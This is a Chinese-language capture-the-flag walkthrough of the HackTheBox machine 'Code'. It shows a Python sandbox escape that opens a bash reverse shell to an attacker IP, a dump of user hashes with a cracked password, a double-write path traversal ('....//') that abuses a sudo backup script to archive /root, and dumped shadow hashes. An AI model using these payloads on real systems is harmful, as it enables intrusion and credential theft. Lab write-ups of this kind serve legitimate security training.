基本信息

https://app.hackthebox.com/machines/Code
10.10.11.62

端口扫描

22和5000:

$ nmap -sC -sV -Pn 10.10.11.62
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-24 13:56 CST
Nmap scan report for 10.10.11.62
Host is up (0.066s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 b5:b9:7c:c4:50:32:95:bc:c2:65:17:df:51:a2:7a:bd (RSA)
|   256 94:b5:25:54:9b:68:af:be:40:e1:1d:a8:6b:85:0d:01 (ECDSA)
|_  256 12:8c:dc:97:ad:86:00:b4:88:e2:29:cf:69:b5:65:96 (ED25519)
5000/tcp open  http    Gunicorn 20.0.4
|_http-title: Python Code Editor
|_http-server-header: gunicorn/20.0.4
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.04 seconds

5000

在线的code runner：

Code Runner & user flag

存在关键词过滤：

基础的绕过：

python模板注入与沙箱逃逸 – 苦海
https://www.kitsch.life/2020/11/23/python%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E4%B8%8E%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/

1 2	# 317是popen ().__class__.__base__.__subclasses__()[317](["/bin/bash","-c","bash -i >& /dev/tcp/10.10.14.12/4444 0>&1"])

打到app-production：

database.db

app目录里可以翻到一个数据库文件，查看内容,得到的hash解密：

app-production@code:~/app/instance$ sqlite3 ./database.db

sqlite> select * from user;
1|development|759b74ce43947f5f4c91aeddc3e5bad3
2|martin|3de6f30c4a09c27fc71932bfc68474be

development
nafeelswordsmaster

martin

得到的密码登录martin，可以看到sudo运行backup相关的：

查看代码，根据task.json运行backup操作，并且对路径有检测，会把directories_to_archive中的 ../ 替换为空后判断是否以指定路径开头：

但替换只进行一次，导致可以双写绕过

提权 & root flag

参考他原本的task.json,修改一份，运行，备份root目录：

1 2	sudo /usr/bin/backy.sh miao.json tar -xvjf code_var_.._root_2025_March.tar.bz2

miao.json

{
    "destination": "/home/martin/backups/",
    "multiprocessing": true,
    "verbose_log": true,
    "directories_to_archive": [
        "/var/....//root/"
    ]
}

shadow

1
2
3

root:$6$UHZYd6beZ0z/jb9q$9dEz/1pi4fnVirs9VuURIvU0X/PO321dFctbLr3EBeeii31EZ7OjetlzaiHMZa5HC6jJEN5FWLva/oisCnc4D1:19931:0:99999:7:::
app-production:$6$HjHAfjyM/2n2iItl$.So3HPNRtfPFQlcRvRPYpVzro48elIVza8GdeOVIzd47zJLP7QibwcVh8NIUxttofJiBGS1b36tiVuNoaEyMU0:19931:0:99999:7:::
martin:$6$wSHwZeJrAIh31tGN$1aAHjOgCNDWuEOpzMydwUp4GbiguXz02L8i8YBC.yd7YQ4BZbOr/VMBjzzjTdMVoAnr37omZ/HJXMy.JBIfZ3.:19962:0:99999:7:::

参考资料

python模板注入与沙箱逃逸 – 苦海
https://www.kitsch.life/2020/11/23/python%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E4%B8%8E%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/

Code - HackTheBox

2025-03-24